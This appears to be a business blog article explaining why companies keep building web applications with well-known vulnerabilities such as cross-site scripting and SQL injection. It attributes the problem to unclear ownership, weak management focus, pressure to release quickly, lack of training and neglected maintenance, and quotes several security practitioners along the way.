Summary: As cyber attacks increase and become more sophisticated, businesses should be doubling down on their application security. Yet, application security still lags behind. Businesses are not only still developing unsecure applications, they’re building applications with widely-known vulnerabilities. Why is security still such a big problem, and how can you address it?
Let me ask you a question: Which aspect of your business systems do you think hackers target the most? As mentioned in this article: “According to numerous studies, the preferred method for attacking businesses’ online assets is via their Web applications.”
Why do hackers target web apps? Because they are commonly built with known vulnerabilities–giving attackers an easy way into a business.
A recent report found that 86 percent of web applications tested had serious issues with authentication, access control, and confidentiality. What’s worse, 52% of web applications suffered from commonly-known vulnerabilities, like Cross-Site Scripting, SQL Injection, and others.
These findings are downright scary. Businesses aren’t even protecting their applications against the most common threats. For a decade now, threats like Cross-Site Scripting and SQL Injection have taken the top spots in the OWASP Top Ten list–a listing of the most critical web app security flaws. What’s more, they’re not that hard to fix.
Consider those facts: Most business web applications suffer from widely known, yet preventable security vulnerabilities. They are not new threats–being listed as a top security threat for over 10 years running. These threats can cause irreparable damage to a business.
Why does this keep happening year after year? Why do businesses keep creating applications containing known (and dangerous) vulnerabilities? How can your business address these issues? Today, let’s explore those questions. Here are a few common reasons why businesses still create unsecure applications:
1. Web application security is nobody’s job
Businesses often approach development with a false assumption: Good developers understand security, and build it into their applications. To a certain extent, that’s true. Developers should understand the basics of building a secure application.
But, you can’t expect a developer to be a security expert. It’s an unfair assumption, considering their job description centers around development. They get hired to build applications. Can they possibly compete with hackers who spend all of their time trying to attack web applications? Of course not. They may understand the basics, but they don’t have the time to keep up with every aspect of security.
“Application developers are rarely (never?) hired because of their security expertise,” says Julien Bellanger, CEO of Prevoty. “They are hired to deliver new applications and new functionality. In order to attempt to stay ahead of hackers, security professionals need to spend a lot of their working lives monitoring the “state of the art” in terms of publicly available knowledge around vulnerabilities. It takes a thief to catch a thief. Developers were not hired to do this, they don’t have the time to do this and their skill sets are not best placed to implement mitigations against complex attacks.”
2. Management places little focus on security
Peter Drucker is famously quoted as saying, “What is measured improves.” The problem for many developers: Security isn’t measured. They don’t get measured or rewarded for creating secure applications.
It’s a great question to ask yourself: What are we measuring? What is our reward structure? If you judge and reward your developers on how quickly they work, but not on security…what do you think will happen? Developers will recognize that management places little emphasis on security, and will follow the lead.
“Security takes time and money and in most organisations it’s at the bottom of the priority list,” says Andreas Heiberg, Senior Developer at UpDownLeftRight. “When deadlines are slipping and money is tight it’s easy to skip vigorously testing and over architecting your system.”
3. Security takes a backseat to development speed
“In my experience, working with large and small development organisations, the main reason behind this is the rush to be first to market,” says Taz Wake CPP CISSP CISM CEH CRISC CCISO CCSK, Security Director at Halkyn Consulting Ltd. “The business driver is for applications to be developed quickly, before a competitor can produce one, and then deployed to the user community. This speed to market, combined with downward pressure on costs, often leads to developers reusing the same code blocks so mistakes keep turning up. On one client engagement we discovered that the developers were simply searching github and google code for everything and using it without making any changes – even when the code had been posted to ask for help fixing a problem.”
This problem stems from the issue mentioned above. What are you measuring? Businesses frequently place greater importance on other areas of development (like speed), forcing security to take a backseat. How common is this problem? As mentioned below, a recent survey found it affects 70% of developers.
“Agile development methodologies have become almost standard for enterprise application development and business requirements are driving more rapid application releases,” says Bellanger. “This means that the time required to fix all identified vulnerabilities is often short and sometimes non-existent. We surveyed over 200 application developers on this very topic and found that more than 70 percent admitted that business pressures to release application updates often overrode security concerns.”
4. The business doesn’t invest in proper training
The security landscape constantly evolves. Developers need regular training, just to keep up with best practices. Without it, they can’t possibly stay on top of security changes, while handling their development responsibilities.
The problem: If business leaders don’t grasp the importance of security, they won’t devote resources to proper training. Without a mandate for training that comes from leadership, developers will focus their efforts on meeting their daily demands–while falling more and more out of touch with security.
“There are many security problems that continue to permeate the application development arena,” says Max Aulakh, Chief Security Architect at MAFAZO: Digital Solutions. “The primary being lack of training that targets developer behavior change. We are teaching about how to do bug changes, create threat models and yet fail to address impact to the business that developers get and understand so it’s in their best interest to build a secure application. This has to come from leadership down in the form of training and it’s NOT best done via power point slides. This is fundamental to building secure applications more so than any process or software you could purchase.”
5. Application development gets treated as a one-time project
The security landscape is constantly evolving. New threats emerge on a daily basis. Software vendors regularly release patches to cover new security flaws.
The problem is, development is often looked at as a one-time project. Once the application is completed and delivered, it’s on to the next one. But, who is in charge of keeping existing applications secure? Who is in charge of keeping frameworks and libraries used in an application up to date? If you don’t know, the answer is probably “no one.”
“A business building its own apps usually treats it as a one-time endeavor,” says Tsahi Levent-Levi, Consultant and Analyst, Founder of BlogGeek.me. “Once the app is complete and launched, little is done to improve and maintain it beyond the basics. Security threats are an ongoing issue – one you need to deal with continuously, so unless the app in question is core to the business itself (i.e – makes direct money as opposed to being supportive to the business itself), little will be done to actively find and fix these security issues.”
Now, I realize this list of challenges might seem daunting to those exploring mobile apps for the first time. But, don’t let it scare you. Hopefully this article helps prepare you for the journey, and gives you a good idea of what to expect. If you would like to add anything to this list, I’d love to hear it. Feel free to share in the comments.